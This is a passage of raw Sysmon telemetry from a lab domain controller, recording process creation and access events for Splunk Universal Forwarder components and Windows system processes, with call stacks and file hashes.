Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:44.560{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:08:44.560{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:44.560{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:08:44.560{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:44.560{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-966C-6005-7A05-00000000A301}4832C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:44.560{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-966C-6005-7A05-00000000A301}4832C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:44.561{59A5CD1D-966C-6005-7A05-00000000A301}4832C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:45.545{59A5CD1D-966D-6005-7B05-00000000A301}61084100C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:45.392{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-966D-6005-7B05-00000000A301}6108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:45.390{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:08:45.390{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:45.390{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:08:45.390{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:45.390{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-966D-6005-7B05-00000000A301}6108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:45.389{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-966D-6005-7B05-00000000A301}6108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:45.389{59A5CD1D-966D-6005-7B05-00000000A301}6108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:46.893{59A5CD1D-966E-6005-7D05-00000000A301}45644544C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:46.732{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-966E-6005-7D05-00000000A301}4564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:46.732{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:08:46.732{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:46.732{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:08:46.732{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:46.732{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-966E-6005-7D05-00000000A301}4564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:46.732{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-966E-6005-7D05-00000000A301}4564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:46.733{59A5CD1D-966E-6005-7D05-00000000A301}4564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:46.060{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-966E-6005-7C05-00000000A301}1420C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:08:46.060{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 